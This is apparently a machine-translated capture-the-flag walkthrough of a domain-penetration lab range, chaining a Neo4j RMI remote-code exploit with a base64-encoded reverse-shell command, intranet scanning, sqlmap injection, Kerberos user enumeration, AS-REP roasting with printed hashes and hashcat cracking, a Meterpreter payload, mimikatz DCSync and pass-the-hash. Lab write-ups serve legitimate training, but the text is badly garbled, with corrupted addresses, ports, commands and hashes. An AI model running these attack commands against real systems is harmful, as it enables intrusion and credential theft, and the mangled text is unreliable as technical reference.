.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
命令
時間は、中程度の難易度を持つ射撃場環境です。この課題を完了することで、プレイヤーはプロキシ転送、イントラネットスキャン、情報収集、特権エスカレーション、およびイントラネットの浸透における水平方向の動きの技術的方法を理解し、ドメイン環境のコア認証メカニズムの理解を強化し、ドメイン環境の浸透における興味深い技術的ポイントを習得するのに役立ちます。射撃場には4つのフラグがあり、さまざまなターゲットマシンに配布されています。
テクノロジー
Neo4J、Kerberos、特権の昇格、ドメイン浸透
最初のフラグ
屋外IP情報コレクション
Infoscanを開始
(ICMP)ターゲット'39 .98.236.25 'は生きています
ICMP AliveホストLen IS: 1
39.98.236.25:22オープン
39.98.236.25:1337オープン
39.98.236.25:7474オープン
39.98.236.25:7473オープン
39.98.236.25:7687オープン
39.98.236.25:3555オープン
Alive Ports Len IS: 6
Vulscanを開始します
完成0/6 [ - ] Webtitle http://39.98.236.25:7473 GET 'http://39.98.236.25:7473'3360 Net/HTTP: HTTP/1.Xトランスポート'\ x15 \ x03 \ x03 \ x00 \ x02 \ x02p'
[*] webtitle:33333399.98.236.25:7474 code:200 len:145 title3360none
[*] webtitle:333333399.98.236.25:7687 code:400 len3:0 title:none
[*] webtitle:3333333939.98.236.25:7687 code:400 len3:0 title:none
6/6を完了しました
スキャンエンド
neo4j不正rce
NEO4Jは、オープンソースグラフデータベース管理システムです。
NEO4J 3.4.18以前には、Neo4Jシェルインターフェイスが有効になっている場合、攻撃者は任意の方法をRMIプロトコルを介して不正なアイデンティティとして呼び出すことができます。この脆弱性はRMIの劣るものではないため、Javaバージョンの影響はありません。 Neo4J 3.5以降のバージョンでは、Neo4Jシェルはサイバーシェルに置き換えられました。
https://github.com/zwjjustdoit/cve-2021-34371.jar
Java -jar Rhino_gadget.jar Rmi3360 //39.98.236.2533601337 'Bash -C {echo、ymfzacatasa+jiavzgv2l3r . nc81ntu1ida+jje=} | 
バウンスシェル
フラグを見つけます
最初のフラグを取得します
2番目のフラグ
イントラネット浸透
アップロードエージェントとFSCAN
Infoscanを開始します
完了0/0 IP4:ICMP 0.0.0.0: Socket:操作は許可されていません
runicmp2を試してみます
ICMPパケットを送信できない現在のユーザー権限
pingを開始します
(ICMP)ターゲット172.22.6.12は生きています
(ICMP)ターゲット172.22.6.25は生きています
(ICMP)ターゲット172.22.6.38は生きています
(ICMP)ターゲット172.22.6.36は生きています
[*] ICMP Alive Hosts Len IS: 4
172.22.6.25:445オープン
172.22.6.12:445オープン
172.22.6.25:139オープン
172.22.6.12:139オープン
172.22.6.25:135オープン
172.22.6.12:135オープン
172.22.6.38:80オープン
172.22.6.36:22オープン
172.22.6.38:22オープン
172.22.6.36:7687オープン
172.22.6.12:88オープン
[*] Alive Ports Len IS: 11
Vulscanを開始します
[+] NetInfo:
[*] 172.22.6.25
[ - ] Win2019
[ - ] 172.22.6.25
[+] NetInfo:
[*] 172.22.6.12
[ - ] dc-progame
[ - ] 172.22.6.12
[*] 172.22.6.12 [+] DC Xiaorang \ DC-Progame Windows Server 2016 DataCenter 14393
[*] 172.22.6.25 Xiaorang \ Win2019
[*] 172.22.6.12(Windows Server 2016 Datacenter 14393)
[*] webtitle:3333333333333:200 len:1531 title:バックエンドログイン
[*] webtitle:33333333333333333363633607687 code:400 len:50 title:none
11/11
SQL注入
に記入してくださいhttp://172.22.6.38にアクセスしてください。これはデータパケットをクロールするログインページです
post /index.php http /1.1
HOST: 172.22.6.38
Content-Length: 30
Cache-Control: Max-age=0
アップグレード-Insecure-Requests: 1
Origin: http://172.22.6.38
Content-Type:アプリケーション/x-www-form-urlencoded
user-agent: mozilla/5.0(windows nt 10.0; win64; x64)applewebkit/537.36(khtml、geckoのような)chrome/107.0.0.0 safari/537.36
Accept: Text/HTML、Application/XHTML+XML、Application/XML; Q=0.9、Image/Avif、Image/Webp、Image/Apng、*/*; Q=0.8、Application/Signed-Exchange; v=b3; q=0.9
参照: http://172.22.6.38/
Accept-Encoding: gzip、deflate
Accept-Language: ZH-CN、ZH; Q=0.9、ZH-TW; Q=0.8
Connection:閉じます
username=adminpassword=1111111 sqlmapを使用したテストインジェクション(プロセス省略)
sqlmap -r 1.txt - dump -t oa_f1agggg -d oa_db -batch 2番目のフラグを取得します
OA_ADMINテーブルとOA_USERSテーブルもあります。これは、ユーザーテーブルに500のユーザー名を辞書Username.txtに収集します
frag
ドメインユーザー列挙
Kerberos 'As-Req認証で、CNAME値のユーザーが存在しない場合、パッケージはKDC_ERR_C_PRINCIPAL_UNKNOWNをプロンプトします。
https://github.com/ropnop/kerbrute
proxychains ./kerbrute_linux_amd64 userenum - dc 172.22.6.12 -d xiaorang.lab username.txt -t 10kaliのプロキシ実行は成功しておらず、結果も表示されません。ファイルはエントリマシンに渡され、結果はリモート実行後にのみ取得されます
合計74人のユーザーがいます。
as-reproasting
ドメインユーザーの場合、オプションがKerberosの事前認定を必要としない場合(Kerberosの事前識別は必要ありません)、AS-REQリクエストをドメインコントローラーの88ポートに送信し、受信したAS-REPコンテンツを再結合し、「Kerberos 5 As-Rep Etype 23」の形式にスプライスできます。次に、HashcatまたはJohnを使用してそれをクラックし、最終的にユーザーのPlantextパスワードを取得できます。
事前に認識されていないアカウントを見つけます
proxychains python3 getnpusers.py -dc -ip 172.22.6.12 -usersfile user.txt xiaorang.lab/
2つのアカウントを入手してくださいwenshao@xiaorang.lab、zhangxin@xiaorang.lab
$ KRB5ASREP 23 $ 23 $ wenshao@xiaorang.lab@xiaorang.lab3360b6c410706b5e96c693b2fc61ee1064c3 $ 2dc9fe784e79973333f30c6bc422222222222222222222222BBA94Be7022222222222222e 8C11359FD92597E253752F4E61D2D18A83F19B5C9DF4761E485853A3D879BCF7A270D 6F846683B811A80DDA3809528190D7F058A24996AFF13094FF9B32C0E2698F6D639B4D 237A06D13C309CE7AB428656B79E582609240B01FB5CD47C91573F80F846DC483A113 A86977486CECCE78C03860050A81EE19921D3500F36FF39FA77EDD9D5614CF4B9087D3 E42CAEF68313D1BB0C4F6BC5392943557B584521B305F61E418EB0F6EB3BF3339404892 DA55134CB4BF828AC318FE00D68D1778B7C82CAF03B65F1938E54ED3FA51B63CDB29994
$ KRB5ASREP 23 $ 23 $ ZHANGXIN@XIAORANG.LAB@XIAORANG.LAB:971802B84CE99050AD3C5F49D11FD0B7 $ 6C1BE075C3CF2A7695529DE2E2EBB39C3C3C3C3C3C3C3C39C5C5C7E5326C926C91DAC26C926C926C91DAC26C9 9892F76BEFE52C860E4E1E2FF6537A5765A6BCB6B8BACA792D60765AC0BBE1B3C5E59F3 EC51B7426636A437D5DF12130EB68D9B17EF431455415671C7331A17CE823E28CC41167 7BED341D3FCEEFC3451B8B232EA6039661625A5C793E30C4D149B2ED9D2926E9D825B38 28744EBCE69E47746994C9A749CEEB76C560A1840BC74D2B9F301BB5B870C6805915163 54460DAB2238E7827900ED80320DD3A6F46874B1BC8A3A68AEA7BD11D0683EC94103F59D9511691090928E98D0D8978F51E71FD9DB0067FA0928E928E98E98D0D8978F510FATATATATATATATATAITA Hashcatを使用して復号化します
Hashcat -M 18200 - Force -a 0 '$krb5asrep$23$wenshao@xiaorang.lab@XIAORANG.LAB:b6c410706b5e96c693b2fc61ee1064c3$2dc9fbee784e7997333f30c6bc4298ab5752ba94be7022e807af4 18C11359FD92597E253752F4E61D2D18A83F19B5C9DF4761E485853A3D879BCF7A270D 6F846683B811A80DDA3809528190D7F058A24996AFF13094FF9B32C0E2698F6D639B4D 237A06D13C309CE7AB428656B79E582609240B01FB5CD47C91573F80F846DC483A113A 86977486CECCE78C03860050A81EE19921D3500F36FF39FA77EDD9D5614CF4B9087D3E 42CAEF68313D1BB0C4F6BC5392943557B584521B305F61E418EB0F6EB3BF3339404892D A55134CB4BF828AC318FE00D68D1778B7C82CAF03B65F1938E54ED3FA51B63CDB2994 ' Rockyou.txt 
hashcat -m 18200 - force -a 0 '$ KRB5ASREP $ 23 $ $ ZHANGXIN@Xiaorang.lab@Xiaorang.LAB:971802B84CE999050AD3C5F49D11FD0B7 $ 6C1BE075C3C3C3CF2A76955529DE2EBBF39C5C5EC7E5326C926C91891DAC7E5326C91891DAC7E51891DAC7E5326C91891DAC7E526C9189189189189 b239892f76befe52c860e4e1e2ff6537a5765a6bcb6b8baca792d60765ac0bbe1b3c5e 59F3EC51B7426636A437D5DF12130EB68D9B17EF431455415671C7331A17CE823E28CC 411677BED341D3FCEEFC3451B8B232EA6039661625A5C793E30C4D149B2ED9D2926E9D 825B3828744EBCE69E47746994C9A749CEEB76C560A1840BC74D2B9F301BB5B870C680 591516354460DAB2238E7827900ED80320DD3A6F46874B1BC8A3A68AEA7BD11D0683EC 94103F59D9511691090928E98D0D8978F511E71FD9DB0067FA0D450C120F3726918D7 '' Rockyou.txt 
この方法では、2つのアカウントとパスワードを取得しました
zhangxin@xiaorang.lab/strawberry
wenshao@xiaorang.lab/hellokitty
ドメイン環境分析
ドメインアカウントでログイン172.22.6.25、データ収集のためにSharphoundをアップロード
Sharphound.exe -Cすべてのエクスポートファイルには複数のJSonが含まれており、ドメイン内のさまざまな関係を節約します
データをブラッドハウンドにアップロードし、分析をクリックして、ドメイン管理者への最短パスを見つけます
ドメイン管理者への最短のパスを見つける厚から薄いまでのパスは、XXがXXに持っている権限または関係です。したがって、パスは次のとおりです
Bloodhoundから、ユーザーYuxuanを行うために必要な次のステップがわかることがわかります
Windows自動ログイン
Hassession:ユーザーがコンピューターでセッションを行っている場合、資格情報はメモリに保持され、YuxuanがWin2019にログインしたことを示します
多くのユーザーは、自動的にログインするコンピューターのセットアップに使用されており、MSFを使用してユーザー名とパスワードを自動的にログインすることができます。
ポジティブシェルになります
msfvenom -p Windows/MeterPreter/bind_tcp -f exe -o shy.exeその後、ターゲットマシンWin2019(172.22.6.25)にアップロードして実行して実行します
プロキシと接続を使用してMSFを実行します
Exploit/Multi/Handlerを使用します
ペイロードWindows/MeterPreter/bind_tcpを設定します
RHOST 172.22.6.25を設定します
を実行して、自動ログインのパスワードをクロールします
MeterPreter Run Run Windows/Graching/Credentials/Windows_Autologin 
ここでパスワードをキャッチしておらず、続行できませんでした。
他の人のWPが続行するのを見続ける方法はありません。
パスワードをつかんでYuxuan/Yuxuan7Qbrgz3lを入手してください。
ハッシュパス
Hassidhistory:ユーザーのSID履歴。ユーザーがドメインに移行した後、チケットには前のドメインが配置されているグループのSIDも含まれています。ユーザーは以前のドメインに属していませんが、以前のドメインへの許可がまだあります。
Yuxuanを使用して、管理者のハッシュをキャプチャします
mimikatz.exe 'lsadump:3360dcsync /domain:xiaorang.lab /user:administrator'出口
プロキシチャインCrackmapexec SMB 172.22.6.25 -U Administrator -H04D93FD6F5F6E4490E0DE23F40A5E9 -D XIAORANG.LAB -X 'タイプユーザー\ Administrator \ Administrator \ flag \ flag03.txt' https://zhuanlan.zhihu.com/p/582525371